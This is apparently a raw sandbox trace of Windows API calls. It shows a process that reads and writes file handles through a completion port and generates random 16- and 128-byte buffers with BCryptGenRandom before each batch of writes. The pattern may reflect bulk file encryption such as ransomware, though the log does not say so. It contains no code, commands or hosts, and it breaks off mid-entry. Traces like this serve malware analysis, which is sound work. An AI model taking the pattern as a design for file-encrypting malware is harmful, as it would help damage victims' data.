1 [0084.772] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0084.789] ReadFile (in: hFile=0x3b4, lpBuffer=0x1fb18f4, nNumberOfBytesToRead=0x1f0a, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0) returned 1 [0084.790] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0084.790] CloseHandle (hObject=0x3b4) returned 1 [0084.796] free (_Block=0x1fb18c0) [0084.796] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0084.812] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0084.813] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0084.813] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34afc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x34afc30) returned 0x0 [0084.813] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0084.813] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0084.813] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34af970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x34af970) returned 0x0 [0084.813] calloc (_Count=0x40, _Size=0x4) returned 0x1ff1e60 [0084.813] calloc (_Count=0x41, _Size=0x4) returned 0x77d800 [0084.813] free (_Block=0x1ff1e60) [0084.813] calloc (_Count=0x41, _Size=0x4) returned 0x1ff1e60 [0084.814] calloc (_Count=0x82, _Size=0x4) returned 0x1ff1930 [0084.814] free (_Block=0x1ff1e60) [0084.814] free (_Block=0x1ff1930) [0084.814] free (_Block=0x77d800) [0084.814] WriteFile (in: hFile=0x3b4, lpBuffer=0x1fb18f4*, nNumberOfBytesToWrite=0x61a, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0) returned 1 [0084.814] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0084.816] WriteFile (in: hFile=0x3b4, lpBuffer=0x1fb18f4*, nNumberOfBytesToWrite=0x1150, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0) returned 1 [0084.816] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0084.836] ReadFile (in: hFile=0x3b4, lpBuffer=0x1fb18f4, nNumberOfBytesToRead=0x1ed0, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0) returned 1 [0084.836] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0084.837] CloseHandle (hObject=0x3b4) returned 1 [0084.844] free (_Block=0x1fb18c0) [0084.844] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0084.857] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0084.857] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0084.858] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34afc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x34afc30) returned 0x0 [0084.858] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0084.858] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0084.858] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34af970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x34af970) returned 0x0 [0084.858] calloc (_Count=0x40, _Size=0x4) returned 0x1ff1e60 [0084.858] calloc (_Count=0x41, _Size=0x4) returned 0x77d800 [0084.858] free (_Block=0x1ff1e60) [0084.859] calloc (_Count=0x41, _Size=0x4) returned 0x1ff1e60 [0084.859] calloc (_Count=0x82, _Size=0x4) returned 0x1ff1930 [0084.859] free (_Block=0x1ff1e60) [0084.859] free (_Block=0x1ff1930) [0084.859] free (_Block=0x77d800) [0084.859] WriteFile (in: hFile=0x3b4, lpBuffer=0x1fb18f4*, nNumberOfBytesToWrite=0x616, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0) returned 1 [0084.859] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0084.861] WriteFile (in: hFile=0x3b4, lpBuffer=0x1fb18f4*, nNumberOfBytesToWrite=0x41d0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0) returned 1 [0084.861] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0084.879] ReadFile (in: hFile=0x3b4, lpBuffer=0x1fb18f4, nNumberOfBytesToRead=0x3dd2a, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0) returned 1 [0084.882] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0084.911] ReadFile (in: hFile=0x3b4, lpBuffer=0x1fb18f4, nNumberOfBytesToRead=0x3fc64, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0) returned 1 [0084.913] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0084.916] CloseHandle (hObject=0x3b4) returned 1 [0084.957] free (_Block=0x1fb18c0) [0084.957] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0084.958] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0084.958] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0084.958] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34afc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x34afc30) returned 0x0 [0084.958] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0084.959] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0084.959] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34af970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x34af970) returned 0x0 [0084.959] calloc (_Count=0x40, _Size=0x4) returned 0x1ff1e60 [0084.959] calloc (_Count=0x41, _Size=0x4) returned 0x77d800 [0084.959] free (_Block=0x1ff1e60) [0084.959] calloc (_Count=0x41, _Size=0x4) returned 0x1ff1e60 [0084.959] calloc (_Count=0x82, _Size=0x4) returned 0x3db00b8 [0084.960] free (_Block=0x1ff1e60) [0084.960] free (_Block=0x3db00b8) [0084.960] free (_Block=0x77d800) [0084.960] WriteFile (in: hFile=0x3bc, lpBuffer=0x3d7007c*, nNumberOfBytesToWrite=0x610, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70048 | out: lpBuffer=0x3d7007c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70048) returned 1 [0084.961] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0084.965] WriteFile (in: hFile=0x3bc, lpBuffer=0x3d7007c*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70048 | out: lpBuffer=0x3d7007c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70048) returned 1 [0084.966] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0085.018] ReadFile (in: hFile=0x3bc, lpBuffer=0x1fb18f4, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0) returned 0x0 [0085.037] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0085.053] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0085.053] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0085.053] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34afc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x34afc30) returned 0x0 [0085.053] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0085.054] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0085.054] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34af970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x34af970) returned 0x0 [0085.054] calloc (_Count=0x40, _Size=0x4) returned 0x77d800 [0085.054] calloc (_Count=0x41, _Size=0x4) returned 0x77d908 [0085.054] free (_Block=0x77d800) [0085.054] calloc (_Count=0x41, _Size=0x4) returned 0x1ff1930 [0085.054] calloc (_Count=0x82, _Size=0x4) returned 0x1ff1a40 [0085.055] free (_Block=0x1ff1930) [0085.055] free (_Block=0x1ff1a40) [0085.055] free (_Block=0x77d908) [0085.055] WriteFile (in: hFile=0x3b8, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x610, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0085.056] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0085.074] WriteFile (in: hFile=0x3b4, lpBuffer=0x3d7007c, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70048 | out: lpBuffer=0x3d7007c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70048) returned 0x0 [0085.075] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0085.118] ReadFile (in: hFile=0x3ac, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x14fc, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0085.127] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0085.132] CloseHandle (hObject=0x3ac) returned 1 [0085.137] free (_Block=0x1ff1e60) [0085.137] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0085.156] CloseHandle (hObject=0x3c0) returned 1 [0085.160] free (_Block=0x2031ed0) [0085.163] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0085.186] CloseHandle (hObject=0x3bc) returned 1 [0085.187] free (_Block=0x1fb18c0) [0085.187] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0085.242] WriteFile (in: hFile=0x3a0, lpBuffer=0x3e300ac, nNumberOfBytesToWrite=0x1270, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e30078 | out: lpBuffer=0x3e300ac, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e30078) returned 0x0 [0085.242] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0085.265] ReadFile (in: hFile=0x3b8, lpBuffer=0x1fb18f4, nNumberOfBytesToRead=0x59b9, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0) returned 0x0 [0085.276] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0085.294] ReadFile (in: hFile=0x3c0, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0xc8e, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0085.294] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0085.317] CloseHandle (hObject=0x3b8) returned 1 [0085.317] free (_Block=0x1fb18c0) [0085.317] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0085.330] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0085.330] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0085.330] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34afc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x34afc30) returned 0x0 [0085.330] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0085.331] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0085.331] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34af970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x34af970) returned 0x0 [0085.334] calloc (_Count=0x40, _Size=0x4) returned 0x77d800 [0085.334] calloc (_Count=0x41, _Size=0x4) returned 0x77d908 [0085.334] free (_Block=0x77d800) [0085.334] calloc (_Count=0x41, _Size=0x4) returned 0x2071f40 [0085.334] calloc (_Count=0x82, _Size=0x4) returned 0x2072050 [0085.335] free (_Block=0x2071f40) [0085.335] free (_Block=0x2072050) [0085.335] free (_Block=0x77d908) [0085.335] WriteFile (in: hFile=0x3b4, lpBuffer=0x2031f04*, nNumberOfBytesToWrite=0x616, lpNumberOfBytesWritten=0x0, lpOverlapped=0x2031ed0 | out: lpBuffer=0x2031f04*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x2031ed0) returned 1 [0085.335] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0085.357] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0085.358] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0085.358] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34afc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x34afc30) returned 0x0 [0085.358] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0085.358] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0085.358] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34af970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x34af970) returned 0x0 [0085.358] calloc (_Count=0x40, _Size=0x4) returned 0x77d800 [0085.358] calloc (_Count=0x41, _Size=0x4) returned 0x77d908 [0085.358] free (_Block=0x77d800) [0085.358] calloc (_Count=0x41, _Size=0x4) returned 0x2071f40 [0085.358] calloc (_Count=0x82, _Size=0x4) returned 0x2072050 [0085.359] free (_Block=0x2071f40) [0085.359] free (_Block=0x2072050) [0085.359] free (_Block=0x77d908) [0085.359] WriteFile (in: hFile=0x3b8, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x610, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0085.359] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0085.562] CloseHandle (hObject=0x3b4) returned 1 [0085.562] free (_Block=0x3d70048) [0085.562] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0085.595] CloseHandle (hObject=0x3b8) returned 1 [0085.596] free (_Block=0x1fb18c0) [0085.596] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0085.596] WriteFile (in: hFile=0x3bc, lpBuffer=0x3db00ec*, nNumberOfBytesToWrite=0x5e10, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3db00b8 | out: lpBuffer=0x3db00ec*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3db00b8) returned 1 [0085.596] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0085.601] CloseHandle (hObject=0x3c4) returned 1 [0085.601] free (_Block=0x3df0128) [0085.601] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0085.628] ReadFile (in: hFile=0x3c0, lpBuffer=0x2031f04, nNumberOfBytesToRead=0x135b, lpNumberOfBytesRead=0x0, lpOverlapped=0x2031ed0 | out: lpBuffer=0x2031f04*, lpNumberOfBytesRead=0x0, lpOverlapped=0x2031ed0) returned 1 [0085.629] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0085.629] CloseHandle (hObject=0x3c0) returned 1 [0085.629] free (_Block=0x2031ed0) [0085.629] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0085.648] ReadFile (in: hFile=0x3ac, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0xb70, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0085.648] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0085.664] ReadFile (in: hFile=0x3c0, lpBuffer=0x1fb18f4, nNumberOfBytesToRead=0xbb8, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0) returned 1 [0085.664] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0085.682] CloseHandle (hObject=0x3ac) returned 1 [0085.682] free (_Block=0x1ff1e60) [0085.682] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0085.698] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0085.698] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0085.698] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34afc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x34afc30) returned 0x0 [0085.698] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0085.699] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0085.699] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34af970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x34af970) returned 0x0 [0085.699] calloc (_Count=0x40, _Size=0x4) returned 0x77d800 [0085.699] calloc (_Count=0x41, _Size=0x4) returned 0x77d908 [0085.699] free (_Block=0x77d800) [0085.699] calloc (_Count=0x41, _Size=0x4) returned 0x3d70048 [0085.699] calloc (_Count=0x82, _Size=0x4) returned 0x3d70158 [0085.700] free (_Block=0x3d70048) [0085.700] free (_Block=0x3d70158) [0085.700] free (_Block=0x77d908) [0085.700] WriteFile (in: hFile=0x3bc, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x618, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0085.700] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0085.715] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0085.715] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0085.715] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34afc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x34afc30) returned 0x0 [0085.715] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0085.716] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0085.716] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34af970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x34af970) returned 0x0 [0085.716] calloc (_Count=0x40, _Size=0x4) returned 0x77d800 [0085.716] calloc (_Count=0x41, _Size=0x4) returned 0x77d908 [0085.717] free (_Block=0x77d800) [0085.717] calloc (_Count=0x41, _Size=0x4) returned 0x1ff1930 [0085.717] calloc 